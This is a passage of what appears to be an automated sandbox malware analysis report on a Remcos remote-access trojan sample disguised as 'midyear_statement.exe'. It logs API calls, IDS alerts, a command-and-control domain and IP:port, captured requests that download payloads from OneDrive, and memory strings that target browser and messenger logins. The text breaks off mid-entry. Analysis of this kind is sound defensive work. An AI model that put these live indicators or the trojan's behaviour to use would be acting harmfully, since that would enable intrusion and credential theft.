Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: 24_2_12349AF5 FindFirstFileW,FindNextFileW,FindNextFileW,	24_2_12349AF5
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: 24_2_1233BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,	24_2_1233BB30
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: 24_2_1233783C FindFirstFileW,FindNextFileW,	24_2_1233783C
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: 24_2_1233880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,	24_2_1233880C
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: 24_2_1237E879 FindFirstFileExA,	24_2_1237E879
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: 24_2_1233BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,	24_2_1233BD37
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: 24_2_146410F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	24_2_146410F1
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: 24_2_14646580 FindFirstFileExA,	24_2_14646580
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: 27_2_0040AE51 FindFirstFileW,FindNextFileW,	27_2_0040AE51
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: 28_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,	28_2_00407EF8

Source: C:\Users\Public\Libraries\wkrriuhD.pif

Code function: 24_2_12337C97 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,

24_2_12337C97

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2032776 ET TROJAN Remcos 3.x Unencrypted Checkin 192.168.2.7:49708 -> 192.3.109.132:4445
Source: Traffic	Snort IDS: 2032777 ET TROJAN Remcos 3.x Unencrypted Server Response 192.3.109.132:4445 -> 192.168.2.7:49708

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: xwww.zuckdgreb.duckdns.org

Uses dynamic DNS services

Source: unknown

DNS query: name: www.zuckdgreb.duckdns.org

Contains functionality to check if a connection to the internet is available

Source: C:\Users\user\Desktop\midyear_statement.exe

Code function: 0_2_040BD1D0 InternetCheckConnectionA,

0_2_040BD1D0

HTTP GET or POST without a user agent

Source: global traffic

HTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 13.107.139.11 13.107.139.11
Source: Joe Sandbox View	IP Address: 178.237.33.50 178.237.33.50

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: GET /download?resid=653A5056738F1A02%21262&authkey=!ANnz1a3_33sd8v4 HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
Source: global traffic	HTTP traffic detected: GET /download?resid=653A5056738F1A02%21263&authkey=!AN5i5LusLT79ejg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
Source: global traffic	HTTP traffic detected: GET /download?resid=653A5056738F1A02%21264&authkey=!AJnxVlB06nkVKsk HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
Source: global traffic	HTTP traffic detected: GET /download?resid=653A5056738F1A02%21262&authkey=!ANnz1a3_33sd8v4 HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
Source: global traffic	HTTP traffic detected: GET /download?resid=653A5056738F1A02%21263&authkey=!AN5i5LusLT79ejg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
Source: global traffic	HTTP traffic detected: GET /download?resid=653A5056738F1A02%21264&authkey=!AJnxVlB06nkVKsk HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
Source: global traffic	HTTP traffic detected: GET /download?resid=653A5056738F1A02%21262&authkey=!ANnz1a3_33sd8v4 HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
Source: global traffic	HTTP traffic detected: GET /download?resid=653A5056738F1A02%21263&authkey=!AN5i5LusLT79ejg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
Source: global traffic	HTTP traffic detected: GET /download?resid=653A5056738F1A02%21264&authkey=!AJnxVlB06nkVKsk HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\Public\Libraries\wkrriuhD.pif

Code function: 24_2_1234B380 InternetOpenW,InternetOpenUrlW,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,

24_2_1234B380

Source: global traffic	HTTP traffic detected: GET /download?resid=653A5056738F1A02%21262&authkey=!ANnz1a3_33sd8v4 HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
Source: global traffic	HTTP traffic detected: GET /download?resid=653A5056738F1A02%21263&authkey=!AN5i5LusLT79ejg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
Source: global traffic	HTTP traffic detected: GET /download?resid=653A5056738F1A02%21264&authkey=!AJnxVlB06nkVKsk HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
Source: global traffic	HTTP traffic detected: GET /download?resid=653A5056738F1A02%21262&authkey=!ANnz1a3_33sd8v4 HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
Source: global traffic	HTTP traffic detected: GET /download?resid=653A5056738F1A02%21263&authkey=!AN5i5LusLT79ejg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
Source: global traffic	HTTP traffic detected: GET /download?resid=653A5056738F1A02%21264&authkey=!AJnxVlB06nkVKsk HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
Source: global traffic	HTTP traffic detected: GET /download?resid=653A5056738F1A02%21262&authkey=!ANnz1a3_33sd8v4 HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
Source: global traffic	HTTP traffic detected: GET /download?resid=653A5056738F1A02%21263&authkey=!AN5i5LusLT79ejg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
Source: global traffic	HTTP traffic detected: GET /download?resid=653A5056738F1A02%21264&authkey=!AJnxVlB06nkVKsk HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
Source: global traffic	HTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache

Source: wkrriuhD.pif, 0000001B.00000003.1405784796.0000000000AA9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: ://192.168.2.1/all/install/setup.au3https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srffile:///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
Source: wkrriuhD.pif, 0000001B.00000003.1405784796.0000000000AA9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: ://192.168.2.1/all/install/setup.au3https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srffile:///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
Source: wkrriuhD.pif, 00000018.00000002.3665873791.0000000015C60000.00000040.10000000.00040000.00000000.sdmp, wkrriuhD.pif, 0000001D.00000002.1388519475.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
Source: wkrriuhD.pif, 0000001B.00000002.1406582942.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: ccounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
Source: wkrriuhD.pif, 0000001B.00000002.1406582942.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: ccounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
Source: wkrriuhD.pif, 00000018.00000002.3665873791.0000000015C60000.00000040.10000000.00040000.00000000.sdmp, wkrriuhD.pif, 0000001D.00000002.1388519475.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
Source: wkrriuhD.pif	String found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
Source: wkrriuhD.pif, 00000018.00000002.3665263923.0000000014530000.00000040.10000000.00040000.00000000.sdmp, wkrriuhD.pif, 0000001B.00000002.1406156009.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
Source: wkrriuhD.pif, 00000018.00000002.3665263923.0000000014530000.00000040.10000000.00040000.00000000.sdmp, wkrriuhD.pif, 0000001B.00000002.1406156009.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)

Source: unknown

DNS traffic detected: queries for: onedrive.live.com

Source: midyear_statement.exe, 00000000.00000003.1260712967.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1386222924.000000007F070000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1366143666.0000000002AC3000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000003.1261008104.000000007EC30000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: bhv348F.tmp.27.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: bhv348F.tmp.27.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: bhv348F.tmp.27.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: bhv348F.tmp.27.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
Source: bhv348F.tmp.27.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG3.crt0
Source: bhv348F.tmp.27.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA-2.crt0
Source: bhv348F.tmp.27.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTLSRSASHA2562020CA1-1.crt0
Source: midyear_statement.exe, 00000000.00000003.1260712967.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1386222924.000000007F070000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1366143666.0000000002AC3000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000003.1261008104.000000007EC30000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: midyear_statement.exe, 00000000.00000003.1260712967.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1386222924.000000007F070000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1366143666.0000000002AC3000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000003.1261008104.000000007EC30000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: midyear_statement.exe, 00000000.00000003.1260712967.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1386222924.000000007F070000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1366143666.0000000002AC3000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000003.1261008104.000000007EC30000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: midyear_statement.exe, 00000000.00000003.1260712967.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1386222924.000000007F070000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1366143666.0000000002AC3000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000003.1261008104.000000007EC30000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0
Source: midyear_statement.exe, 00000000.00000003.1260712967.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1386222924.000000007F070000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1366143666.0000000002AC3000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000003.1261008104.000000007EC30000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
Source: midyear_statement.exe, 00000000.00000003.1260712967.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1386222924.000000007F070000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1366143666.0000000002AC3000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000003.1261008104.000000007EC30000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: bhv348F.tmp.27.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: bhv348F.tmp.27.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: bhv348F.tmp.27.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
Source: bhv348F.tmp.27.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: bhv348F.tmp.27.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG3.crl07
Source: bhv348F.tmp.27.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
Source: midyear_statement.exe, 00000000.00000003.1260712967.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1386222924.000000007F070000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1366143666.0000000002AC3000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000003.1261008104.000000007EC30000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: midyear_statement.exe, 00000000.00000003.1260712967.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1386222924.000000007F070000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1366143666.0000000002AC3000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000003.1261008104.000000007EC30000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: bhv348F.tmp.27.dr	String found in binary or memory: http://crl3.digicert.com/DigicertSHA2SecureServerCA-1.crl0?
Source: bhv348F.tmp.27.dr	String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
Source: bhv348F.tmp.27.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: bhv348F.tmp.27.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: bhv348F.tmp.27.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG3.crl0
Source: bhv348F.tmp.27.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
Source: bhv348F.tmp.27.dr	String found in binary or memory: http://crl4.digicert.com/DigicertSHA2SecureServerCA-1.crl0
Source: bhv348F.tmp.27.dr	String found in binary or memory: http://crl4.digicert.com/DigicertSHA2SecureServerCA-1.crl0~
Source: midyear_statement.exe, 00000000.00000003.1260712967.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1386222924.000000007F070000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1366143666.0000000002AC3000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000003.1261008104.000000007EC30000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#
Source: midyear_statement.exe, 00000000.00000003.1260712967.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1386222924.000000007F070000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1366143666.0000000002AC3000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000003.1261008104.000000007EC30000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
Source: wkrriuhD.pif, 00000018.00000003.1379033633.00000000124CA000.00000004.00000020.00020000.00000000.sdmp, wkrriuhD.pif, 00000018.00000003.1379159545.00000000124D2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/
Source: wkrriuhD.pif, 00000018.00000002.3664577079.00000000124A0000.00000004.00000020.00020000.00000000.sdmp, wkrriuhD.pif, 00000018.00000002.3664577079.00000000124D4000.00000004.00000020.00020000.00000000.sdmp, wkrriuhD.pif, 00000018.00000002.3664577079.00000000124BD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/json.gp
Source: wkrriuhD.pif, 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, wkrriuhD.pif, 00000018.00000002.3646905411.0000000000590000.00000040.00000400.00020000.00000000.sdmp, wkrriuhD.pif, 0000001F.00000002.1589395937.0000000024140000.00000040.00001000.00020000.00000000.sdmp, wkrriuhD.pif, 0000001F.00000002.1566851721.0000000000590000.00000040.00000400.00020000.00000000.sdmp, wkrriuhD.pif, 00000021.00000002.1638276893.0000000000590000.00000040.00000400.00020000.00000000.sdmp, wkrriuhD.pif, 00000021.00000002.1638093919.00000000004F0000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/json.gp/C
Source: wkrriuhD.pif, 00000018.00000003.1379033633.00000000124A0000.00000004.00000020.00020000.00000000.sdmp, wkrriuhD.pif, 00000018.00000003.1382491430.0000000012491000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/json.gpSystem32
Source: wkrriuhD.pif, 00000018.00000003.1379033633.00000000124BD000.00000004.00000020.00020000.00000000.sdmp, wkrriuhD.pif, 00000018.00000003.1382491430.00000000124BD000.00000004.00000020.00020000.00000000.sdmp, wkrriuhD.pif, 00000018.00000003.1405851694.00000000124BD000.00000004.00000020.00020000.00000000.sdmp, wkrriuhD.pif, 00000018.00000003.1622995189.00000000124BD000.00000004.00000020.00020000.00000000.sdmp, wkrriuhD.pif, 00000018.00000002.3664577079.00000000124BD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/json.gpl
Source: midyear_statement.exe, 00000000.00000003.1260712967.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1386222924.000000007F070000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1366143666.0000000002AC3000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000003.1261008104.000000007EC30000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: bhv348F.tmp.27.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: bhv348F.tmp.27.dr	String found in binary or memory: http://ocsp.digicert.com0:
Source: midyear_statement.exe, 00000000.00000003.1260712967.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1386222924.000000007F070000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1366143666.0000000002AC3000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000003.1261008104.000000007EC30000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0A
Source: midyear_statement.exe, 00000000.00000003.1260712967.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1386222924.000000007F070000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1366143666.0000000002AC3000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000003.1261008104.000000007EC30000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0C
Source: bhv348F.tmp.27.dr	String found in binary or memory: http://ocsp.digicert.com0H
Source: bhv348F.tmp.27.dr	String found in binary or memory: http://ocsp.digicert.com0I
Source: midyear_statement.exe, 00000000.00000003.1260712967.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1386222924.000000007F070000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1366143666.0000000002AC3000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000003.1261008104.000000007EC30000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0X
Source: bhv348F.tmp.27.dr	String found in binary or memory: http://ocsp.msocsp.com0
Source: bhv348F.tmp.27.dr	String found in binary or memory: http://ocsp.msocsp.com0S
Source: midyear_statement.exe, 00000000.00000003.1260712967.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1386222924.000000007F070000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1366143666.0000000002AC3000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000003.1261008104.000000007EC30000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.sectigo.com0
Source: midyear_statement.exe, 00000000.00000003.1260712967.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1386222924.000000007F070000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1366143666.0000000002AC3000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000003.1261008104.000000007EC30000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.sectigo.com0C
Source: bhv348F.tmp.27.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: bhv348F.tmp.27.dr	String found in binary or memory: http://www.digicert.com/CPS0~
Source: wkrriuhD.pif, 00000018.00000002.3665873791.0000000015C60000.00000040.10000000.00040000.00000000.sdmp, wkrriuhD.pif, 0000001D.00000002.1388519475.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.ebuddy.com
Source: wkrriuhD.pif, 00000018.00000002.3665873791.0000000015C60000.00000040.10000000.00040000.00000000.sdmp, wkrriuhD.pif, 0000001D.00000003.1386954582.000000000096D000.00000004.00000020.00020000.00000000.sdmp, wkrriuhD.pif, 0000001D.00000002.1388519475.0000000000400000.00000040.80000000.00040000.00000000.sdmp, wkrriuhD.pif, 0000001D.00000003.1386589217.000000000096D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.imvu.com
Source: wkrriuhD.pif, 00000018.00000002.3665873791.0000000015C60000.00000040.10000000.00040000.00000000.sdmp, wkrriuhD.pif, 0000001D.00000002.1388519475.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
Source: wkrriuhD.pif, 0000001D.00000003.1386954582.000000000096D000.00000004.00000020.00020000.00000000.sdmp, wkrriuhD.pif, 0000001D.00000003.1386589217.000000000096D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.imvu.comppData
Source: wkrriuhD.pif, 00000018.00000002.3665873791.0000000015C60000.00000040.10000000.00040000.00000000.sdmp, wkrriuhD.pif, 0000001D.00000002.1388519475.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.imvu.comr
Source: wkrriuhD.pif, 0000001B.00000002.1406015576.0000000000193000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: http://www.nirsoft.net
Source: wkrriuhD.pif, 0000001D.00000002.1388519475.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.nirsoft.net/
Source: midyear_statement.exe, midyear_statement.exe, 00000000.00000003.1190782910.000000007FD60000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1367976152.00000000040CC000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1366143666.0000000002A80000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1381770717.0000000016137000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1382468437.0000000016170000.00000004.00000020.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1380482770.0000000015C00000.00000004.00000020.00020000.00000000.sdmp, wkrriuhD.pif, wkrriuhD.pif, 00000018.00000000.1358434050.0000000000416000.00000002.00000001.01000000.00000008.sdmp, wkrriuhD.pif, 0000001B.00000000.1383271733.0000000000416000.00000002.00000001.01000000.00000008.sdmp, wkrriuhD.pif, 0000001C.00000000.1383573996.0000000000416000.00000002.00000001.01000000.00000008.sdmp, wkrriuhD.pif, 0000001D.00000000.1384411850.0000000000416000.00000002.00000001.01000000.00000008.sdmp, 